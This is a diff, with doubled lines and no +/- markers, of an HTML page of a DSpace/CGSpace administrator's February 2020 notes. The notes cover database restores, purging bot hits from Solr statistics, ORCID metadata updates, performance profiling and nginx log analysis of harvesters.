$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspace63
$ psql -h localhost -U postgres -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2020-02-06.backup
$ pg_restore -h localhost -U postgres -d dspace63 -O --role=dspacetest -h localhost ~/Downloads/cgspace_2020-02-06.backup
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace63
$ psql -h localhost -U postgres -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres dspace63
dspace63=# CREATE EXTENSION pgcrypto;
dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
dspace63=# DELETE FROM schema_version WHERE version IN (&#39;5.0.2015.01.27&#39;, &#39;5.6.2015.12.03.2&#39;, &#39;5.6.2016.08.08&#39;, &#39;5.0.2017.04.28&#39;, &#39;5.0.2017.09.25&#39;, &#39;5.8.2015.12.03.3&#39;);
dspace63=# DROP VIEW eperson_metadata;
dspace63=# \q
</code></pre><ul>
<li>I purged ~33,000 hits from the &ldquo;Jersey/2.6&rdquo; bot in CGSpace&rsquo;s statistics using my <code>check-spider-hits.sh</code> script:</li>
</ul>
<pre tabindex="0"><code>$ ./check-spider-hits.sh -d -p -f /tmp/jersey -s statistics -u http://localhost:8081/solr
$ for year in 2018 2017 2016 2015; do ./check-spider-hits.sh -d -p -f /tmp/jersey -s &quot;statistics-${year}&quot; -u http://localhost:8081/solr; done
$ for year in 2018 2017 2016 2015; do ./check-spider-hits.sh -d -p -f /tmp/jersey -s &#34;statistics-${year}&#34; -u http://localhost:8081/solr; done
</code></pre><ul>
<li>I noticed another user agen in the logs that we should add to the list:</li>
</ul>
@ -389,23 +389,23 @@ $ for year in 2018 2017 2016 2015; do ./check-spider-hits.sh -d -p -f /tmp/jerse
<li>I made <a href="https://github.com/atmire/COUNTER-Robots/issues/31">an issue on the COUNTER-Robots repository</a></li>
<li>I found a <a href="https://github.com/freedev/solr-import-export-json">nice tool for exporting and importing Solr records</a> and it seems to work for exporting our 2019 stats from the large statistics core!</li>
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01.json -f 'dateYearMonth:2019-01' -k uid
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01.json -f &#39;dateYearMonth:2019-01&#39; -k uid
$ ls -lh /tmp/statistics-2019-01.json
-rw-rw-r-- 1 aorth aorth 3.7G Feb 6 09:26 /tmp/statistics-2019-01.json
</code></pre><ul>
<li>Then I tested importing this by creating a new core in my development environment:</li>
</ul>
<pre tabindex="0"><code>$ curl 'http://localhost:8080/solr/admin/cores?action=CREATE&amp;name=statistics-2019&amp;instanceDir=/home/aorth/dspace/solr/statistics&amp;dataDir=/home/aorth/dspace/solr/statistics-2019/data'
<pre tabindex="0"><code>$ curl &#39;http://localhost:8080/solr/admin/cores?action=CREATE&amp;name=statistics-2019&amp;instanceDir=/home/aorth/dspace/solr/statistics&amp;dataDir=/home/aorth/dspace/solr/statistics-2019/data&#39;
$ ./run.sh -s http://localhost:8080/solr/statistics-2019 -a import -o ~/Downloads/statistics-2019-01.json -k uid
</code></pre><ul>
<li>This imports the records into the core, but DSpace can&rsquo;t see them, and when I restart Tomcat the core is not seen by Solr&hellip;</li>
<li>I got the core to load by adding it to <code>dspace/solr/solr.xml</code> manually, ie:</li>
</ul>
<pre tabindex="0"><code> &lt;cores adminPath=&quot;/admin/cores&quot;&gt;
<pre tabindex="0"><code> &lt;cores adminPath=&#34;/admin/cores&#34;&gt;
...
&lt;core name=&quot;statistics&quot; instanceDir=&quot;statistics&quot; /&gt;
&lt;core name=&quot;statistics-2019&quot; instanceDir=&quot;statistics&quot;&gt;
&lt;property name=&quot;dataDir&quot; value=&quot;/home/aorth/dspace/solr/statistics-2019/data&quot; /&gt;
&lt;core name=&#34;statistics&#34; instanceDir=&#34;statistics&#34; /&gt;
&lt;core name=&#34;statistics-2019&#34; instanceDir=&#34;statistics&#34;&gt;
&lt;property name=&#34;dataDir&#34; value=&#34;/home/aorth/dspace/solr/statistics-2019/data&#34; /&gt;
&lt;/core&gt;
...
&lt;/cores&gt;
@ -439,7 +439,7 @@ $ make
$ ./bin/create-links-in ~/.local/bin
$ export FLAMEGRAPH_DIR=/home/aorth/src/git/FlameGraph
$ export JAVA_HOME=/usr/lib/jvm/java-8-openjdk
$ export JAVA_OPTS=&quot;-XX:+PreserveFramePointer&quot;
$ export JAVA_OPTS=&#34;-XX:+PreserveFramePointer&#34;
$ ~/dspace63/bin/dspace index-discovery -b &amp;
# pid of tomcat java process
$ perf-java-flames 4478
@ -485,12 +485,12 @@ schedtool -D -e ~/dspace63/bin/dspace index-discovery -b 5112.96s user 127.80s
</ul>
<pre tabindex="0"><code>$ export JAVA_HOME=/usr/lib/jvm/java-8-openjdk
$ export PERF_RECORD_SECONDS=60
$ export JAVA_OPTS=&quot;-XX:+PreserveFramePointer&quot;
$ export JAVA_OPTS=&#34;-XX:+PreserveFramePointer&#34;
$ time schedtool -D -e ~/dspace/bin/dspace index-discovery -b &amp;
# process id of java indexing process (not Tomcat)
$ perf-java-record-stack 169639
$ sudo perf script -i /tmp/perf-169639.data &gt; out.dspace510-1
$ cat out.dspace510-1 | ../FlameGraph/stackcollapse-perf.pl | grep -E '^java' | ../FlameGraph/flamegraph.pl --color=java --hash &gt; out.dspace510-1.svg
$ cat out.dspace510-1 | ../FlameGraph/stackcollapse-perf.pl | grep -E &#39;^java&#39; | ../FlameGraph/flamegraph.pl --color=java --hash &gt; out.dspace510-1.svg
</code></pre><ul>
<li>All data recorded on my laptop with the same kernel, same boot, etc.</li>
<li>CGSpace 5.8 (with Atmire patches):</li>
@ -525,14 +525,14 @@ $ cat out.dspace510-1 | ../FlameGraph/stackcollapse-perf.pl | grep -E '^java' |
<ul>
<li>Maria from Bioversity asked me to add some ORCID iDs to our controlled vocabulary so I combined them with our existing ones and updated the names from the ORCID API:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2020-02-11-combined-orcids.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2020-02-11-combined-orcids.txt
$ ./resolve-orcids.py -i /tmp/2020-02-11-combined-orcids.txt -o /tmp/2020-02-11-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
</code></pre><ul>
<li>Then I noticed some author names had changed, so I captured the old and new names in a CSV file and fixed them using <code>fix-metadata-values.py</code>:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-02-11-correct-orcid-ids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -t correct -m 240 -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-02-11-correct-orcid-ids.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.creator.id -t correct -m 240 -d
</code></pre><ul>
<li>On a hunch I decided to try to add these ORCID iDs to existing items that might not have them yet
<ul>
@ -541,22 +541,22 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Staver, Charles&quot;,charles staver: 0000-0002-4532-6077
&quot;Staver, C.&quot;,charles staver: 0000-0002-4532-6077
&quot;Fungo, R.&quot;,Robert Fungo: 0000-0002-4264-6905
&quot;Remans, R.&quot;,Roseline Remans: 0000-0003-3659-8529
&quot;Remans, Roseline&quot;,Roseline Remans: 0000-0003-3659-8529
&quot;Rietveld A.&quot;,Anne Rietveld: 0000-0002-9400-9473
&quot;Rietveld, A.&quot;,Anne Rietveld: 0000-0002-9400-9473
&quot;Rietveld, A.M.&quot;,Anne Rietveld: 0000-0002-9400-9473
&quot;Rietveld, Anne M.&quot;,Anne Rietveld: 0000-0002-9400-9473
&quot;Fongar, A.&quot;,Andrea Fongar: 0000-0003-2084-1571
&quot;Müller, Anna&quot;,Anna Müller: 0000-0003-3120-8560
&quot;Müller, A.&quot;,Anna Müller: 0000-0003-3120-8560
&#34;Staver, Charles&#34;,charles staver: 0000-0002-4532-6077
&#34;Staver, C.&#34;,charles staver: 0000-0002-4532-6077
&#34;Fungo, R.&#34;,Robert Fungo: 0000-0002-4264-6905
&#34;Remans, R.&#34;,Roseline Remans: 0000-0003-3659-8529
&#34;Remans, Roseline&#34;,Roseline Remans: 0000-0003-3659-8529
&#34;Rietveld A.&#34;,Anne Rietveld: 0000-0002-9400-9473
&#34;Rietveld, A.&#34;,Anne Rietveld: 0000-0002-9400-9473
&#34;Rietveld, A.M.&#34;,Anne Rietveld: 0000-0002-9400-9473
&#34;Rietveld, Anne M.&#34;,Anne Rietveld: 0000-0002-9400-9473
&#34;Fongar, A.&#34;,Andrea Fongar: 0000-0003-2084-1571
&#34;Müller, Anna&#34;,Anna Müller: 0000-0003-3120-8560
&#34;Müller, A.&#34;,Anna Müller: 0000-0003-3120-8560
</code></pre><ul>
<li>Running the <code>add-orcid-identifiers-csv.py</code> script I added 144 ORCID iDs to items on CGSpace!</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/2020-02-11-add-orcid-ids.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/2020-02-11-add-orcid-ids.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Minor updates to all Python utility scripts in the CGSpace git repository</li>
<li>Update the spider agent patterns in CGSpace <code>5_x-prod</code> branch from the latest <a href="https://github.com/atmire/COUNTER-Robots">COUNTER-Robots</a> project
@ -575,7 +575,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</li>
<li>Peter asked me to update John McIntire&rsquo;s name format on CGSpace so I ran the following PostgreSQL query:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value='McIntire, John M.' WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value='McIntire, John';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=&#39;McIntire, John M.&#39; WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value=&#39;McIntire, John&#39;;
UPDATE 26
</code></pre><h2 id="2020-02-17">2020-02-17</h2>
<ul>
@ -622,10 +622,10 @@ UPDATE 26
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/select&quot; -d &quot;q=dns:/squeeze3.bronco.co.uk./&amp;rows=0&quot;
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=dns:/squeeze3.bronco.co.uk./&amp;rows=0&#34;
&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
&lt;response&gt;
&lt;lst name=&quot;responseHeader&quot;&gt;&lt;int name=&quot;status&quot;&gt;0&lt;/int&gt;&lt;int name=&quot;QTime&quot;&gt;4&lt;/int&gt;&lt;lst name=&quot;params&quot;&gt;&lt;str name=&quot;q&quot;&gt;dns:/squeeze3.bronco.co.uk./&lt;/str&gt;&lt;str name=&quot;rows&quot;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&quot;response&quot; numFound=&quot;86044&quot; start=&quot;0&quot;&gt;&lt;/result&gt;
&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;4&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;dns:/squeeze3.bronco.co.uk./&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;86044&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
&lt;/response&gt;
</code></pre><ul>
<li>The totals in each core are:
@ -641,8 +641,8 @@ UPDATE 26
</li>
<li>I will purge them from each core one by one, ie:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2015/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;dns:squeeze3.bronco.co.uk.&lt;/query&gt;&lt;/delete&gt;&quot;
$ curl -s &quot;http://localhost:8081/solr/statistics-2014/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;dns:squeeze3.bronco.co.uk.&lt;/query&gt;&lt;/delete&gt;&quot;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2015/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;dns:squeeze3.bronco.co.uk.&lt;/query&gt;&lt;/delete&gt;&#34;
$ curl -s &#34;http://localhost:8081/solr/statistics-2014/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;dns:squeeze3.bronco.co.uk.&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
<li>Deploy latest Tomcat and PostgreSQL JDBC driver changes on CGSpace (linode18)</li>
<li>Deploy latest <code>5_x-prod</code> branch on CGSpace (linode18)</li>
@ -654,13 +654,13 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2014/update?softCommit=tru
</li>
<li>I ran the <code>dspace cleanup -v</code> process on CGSpace and got an error:</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(183996) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(183996) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code># su - postgres
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);'
$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);&#39;
UPDATE 1
</code></pre><ul>
<li>Аdd one more new Bioversity ORCID iD to the controlled vocabulary on CGSpace</li>
@ -671,7 +671,7 @@ UPDATE 1
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
<pre tabindex="0"><code>$ dspace user -a -m wow@me.com -g Felix -s Shaw -p &#39;fuananaaa&#39;
</code></pre><ul>
<li>For some reason the Atmire Content and Usage Analysis (CUA) module&rsquo;s Usage Statistics is drawing blank graphs
<ul>
@ -708,7 +708,7 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
</ul>
</li>
</ul>
<pre tabindex="0"><code># grep -c 'initialize class org.jfree.chart.JFreeChart' dspace.log.2020-0*
<pre tabindex="0"><code># grep -c &#39;initialize class org.jfree.chart.JFreeChart&#39; dspace.log.2020-0*
dspace.log.2020-01-12:4
dspace.log.2020-01-13:66
dspace.log.2020-01-14:4
@ -724,25 +724,25 @@ dspace.log.2020-01-21:4
<li>I deployed the fix on CGSpace (linode18) and I was able to see the graphs in the Atmire CUA Usage Statistics&hellip;</li>
<li>On an unrelated note there is something weird going on in that I see millions of hits from IP 34.218.226.147 in Solr statistics, but if I remember correctly that IP belongs to CodeObia&rsquo;s AReS explorer, but it should only be using REST and therefore no Solr statistics&hellip;?</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2018/select&quot; -d &quot;q=ip:34.218.226.147&amp;rows=0&quot;
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/select&#34; -d &#34;q=ip:34.218.226.147&amp;rows=0&#34;
&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
&lt;response&gt;
&lt;lst name=&quot;responseHeader&quot;&gt;&lt;int name=&quot;status&quot;&gt;0&lt;/int&gt;&lt;int name=&quot;QTime&quot;&gt;811&lt;/int&gt;&lt;lst name=&quot;params&quot;&gt;&lt;str name=&quot;q&quot;&gt;ip:34.218.226.147&lt;/str&gt;&lt;str name=&quot;rows&quot;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&quot;response&quot; numFound=&quot;5536097&quot; start=&quot;0&quot;&gt;&lt;/result&gt;
&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;811&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;ip:34.218.226.147&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;5536097&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
&lt;/response&gt;
</code></pre><ul>
<li>And there are apparently two million from last month (2020-01):</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/select&quot; -d &quot;q=ip:34.218.226.147&amp;fq=dateYearMonth:2020-01&amp;rows=0&quot;
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=ip:34.218.226.147&amp;fq=dateYearMonth:2020-01&amp;rows=0&#34;
&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
&lt;response&gt;
&lt;lst name=&quot;responseHeader&quot;&gt;&lt;int name=&quot;status&quot;&gt;0&lt;/int&gt;&lt;int name=&quot;QTime&quot;&gt;248&lt;/int&gt;&lt;lst name=&quot;params&quot;&gt;&lt;str name=&quot;q&quot;&gt;ip:34.218.226.147&lt;/str&gt;&lt;str name=&quot;fq&quot;&gt;dateYearMonth:2020-01&lt;/str&gt;&lt;str name=&quot;rows&quot;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&quot;response&quot; numFound=&quot;2173455&quot; start=&quot;0&quot;&gt;&lt;/result&gt;
&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;248&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;ip:34.218.226.147&lt;/str&gt;&lt;str name=&#34;fq&#34;&gt;dateYearMonth:2020-01&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;2173455&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
&lt;/response&gt;
</code></pre><ul>
<li>But when I look at the nginx access logs for the past month or so I only see 84,000, all of which are on <code>/rest</code> and none of which are to XMLUI:</li>
</ul>
<pre tabindex="0"><code># zcat /var/log/nginx/*.log.*.gz | grep -c 34.218.226.147
84322
# zcat /var/log/nginx/*.log.*.gz | grep 34.218.226.147 | grep -c '/rest'
# zcat /var/log/nginx/*.log.*.gz | grep 34.218.226.147 | grep -c &#39;/rest&#39;
84322
</code></pre><ul>
<li>Either the requests didn&rsquo;t get logged, or there is some mixup with the Solr documents (fuck!)
@ -758,13 +758,13 @@ dspace.log.2020-01-21:4
</li>
<li>Anyways, I faceted by IP in 2020-01 and see:</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&amp;fq=dateYearMonth:2020-01&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip'
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=*:*&amp;fq=dateYearMonth:2020-01&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip&#39;
...
&quot;172.104.229.92&quot;,2686876,
&quot;34.218.226.147&quot;,2173455,
&quot;163.172.70.248&quot;,80945,
&quot;163.172.71.24&quot;,55211,
&quot;163.172.68.99&quot;,38427,
&#34;172.104.229.92&#34;,2686876,
&#34;34.218.226.147&#34;,2173455,
&#34;163.172.70.248&#34;,80945,
&#34;163.172.71.24&#34;,55211,
&#34;163.172.68.99&#34;,38427,
</code></pre><ul>
<li>Surprise surprise, the top two IPs are from AReS servers&hellip; wtf.</li>
<li>The next three are from Online in France and they are all using this weird user agent and making tens of thousands of requests to Discovery:</li>
@ -775,14 +775,14 @@ dspace.log.2020-01-21:4
<li>I need to see why AReS harvesting is inflating the stats, as it should only be making REST requests&hellip;</li>
<li>Shiiiiit, I see 84,000 requests from the AReS IP today alone:</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-22*+AND+ip:172.104.229.92&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=time:2020-02-22*+AND+ip:172.104.229.92&amp;rows=0&amp;wt=json&amp;indent=true&#39;
...
&quot;response&quot;:{&quot;numFound&quot;:84594,&quot;start&quot;:0,&quot;docs&quot;:[]
&#34;response&#34;:{&#34;numFound&#34;:84594,&#34;start&#34;:0,&#34;docs&#34;:[]
</code></pre><ul>
<li>Fuck! And of course the ILRI websites doing their daily REST harvesting are causing issues too, from today alone:</li>
</ul>
<pre tabindex="0"><code> &quot;2a01:7e00::f03c:91ff:fe9a:3a37&quot;,35512,
&quot;2a01:7e00::f03c:91ff:fe18:7396&quot;,26155,
<pre tabindex="0"><code> &#34;2a01:7e00::f03c:91ff:fe9a:3a37&#34;,35512,
&#34;2a01:7e00::f03c:91ff:fe18:7396&#34;,26155,
</code></pre><ul>
<li>I need to try to make some requests for these URLs and observe if they make a statistics hit:
<ul>
@ -793,12 +793,12 @@ dspace.log.2020-01-21:4
<li>Those are the requests AReS and ILRI servers are making&hellip; nearly 150,000 per day!</li>
<li>Well that settles it!</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&amp;fq=ip:78.128.99.24&amp;rows=10&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:12,&quot;start&quot;:0,&quot;docs&quot;:[
$ curl -s 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=50&amp;offset=82450'
$ curl -s 'http://localhost:8081/solr/statistics/update?softCommit=true'
$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&amp;fq=ip:78.128.99.24&amp;rows=10&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:62,&quot;start&quot;:0,&quot;docs&quot;:[
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&amp;fq=ip:78.128.99.24&amp;rows=10&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:12,&#34;start&#34;:0,&#34;docs&#34;:[
$ curl -s &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=50&amp;offset=82450&#39;
$ curl -s &#39;http://localhost:8081/solr/statistics/update?softCommit=true&#39;
$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&amp;fq=ip:78.128.99.24&amp;rows=10&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:62,&#34;start&#34;:0,&#34;docs&#34;:[
</code></pre><ul>
<li>A REST request with <code>limit=50</code> will make exactly fifty <code>statistics_type=view</code> statistics in the Solr core&hellip; fuck.
<ul>
@ -817,8 +817,8 @@ $ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+s
<li>I tried to add the IPs to our nginx IP bot mapping but it doesn&rsquo;t seem to work&hellip; WTF, why is everything broken?!</li>
<li>Oh lord have mercy, the two AReS harvester IPs alone are responsible for 42 MILLION hits in 2019 and 2020 so far by themselves:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:8081/solr/statistics/select?q=ip:34.218.226.147+OR+ip:172.104.229.92&amp;rows=0&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:42395486,&quot;start&quot;:0,&quot;docs&quot;:[]
<pre tabindex="0"><code>$ http &#39;http://localhost:8081/solr/statistics/select?q=ip:34.218.226.147+OR+ip:172.104.229.92&amp;rows=0&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:42395486,&#34;start&#34;:0,&#34;docs&#34;:[]
</code></pre><ul>
<li>I modified my <code>check-spider-hits.sh</code> script to create a version that works with IPs and purged 47 million stats from Solr on CGSpace:</li>
</ul>
@ -856,7 +856,7 @@ Total number of bot hits purged: 5535399
</ul>
</li>
</ul>
<pre tabindex="0"><code>add_header X-debug-message &quot;ua is $ua&quot; always;
<pre tabindex="0"><code>add_header X-debug-message &#34;ua is $ua&#34; always;
</code></pre><ul>
<li>Then in the HTTP response you see:</li>
</ul>
@ -966,7 +966,7 @@ Total number of bot hits purged: 2228
</code></pre><ul>
<li>Then I purged about 200,000 Baidu hits from the 2015 to 2019 statistics cores with a few manual delete queries because they didn&rsquo;t have a proper user agent and the only way to identify them was via DNS:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2016/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;dns:*crawl.baidu.com.&lt;/query&gt;&lt;/delete&gt;&quot;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2016/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;dns:*crawl.baidu.com.&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
<li>Jesus, the more I keep looking, the more I see ridiculous stuff&hellip;</li>
<li>In 2019 there were a few hundred thousand requests from CodeObia on Orange Jordan network&hellip;
@ -1024,7 +1024,7 @@ Total number of bot hits purged: 14110
<li>Though looking in my REST logs for the last month I am second guessing my judgement on 45.5.186.2 because I see user agents like &ldquo;Microsoft Office Word 2014&rdquo;</li>
<li>Actually no, the overwhelming majority of these are coming from something harvesting the REST API with no user agent:</li>
</ul>
<pre tabindex="0"><code># zgrep 45.5.186.2 /var/log/nginx/rest.log.[1234]* | awk -F\&quot; '{print $6}' | sort | uniq -c | sort -h
<pre tabindex="0"><code># zgrep 45.5.186.2 /var/log/nginx/rest.log.[1234]* | awk -F\&#34; &#39;{print $6}&#39; | sort | uniq -c | sort -h
1 Microsoft Office Word 2014
1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office)
1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
@ -1038,10 +1038,10 @@ Total number of bot hits purged: 14110
</code></pre><ul>
<li>I see lots of requests coming from the following user agents:</li>
</ul>
<pre tabindex="0"><code>&quot;Apache-HttpClient/4.5.7 (Java/11.0.3)&quot;
&quot;Apache-HttpClient/4.5.7 (Java/11.0.2)&quot;
&quot;LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/4.3 +http://www.linkedin.com)&quot;
&quot;EventMachine HttpClient&quot;
<pre tabindex="0"><code>&#34;Apache-HttpClient/4.5.7 (Java/11.0.3)&#34;
&#34;Apache-HttpClient/4.5.7 (Java/11.0.2)&#34;
&#34;LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/4.3 +http://www.linkedin.com)&#34;
&#34;EventMachine HttpClient&#34;
</code></pre><ul>
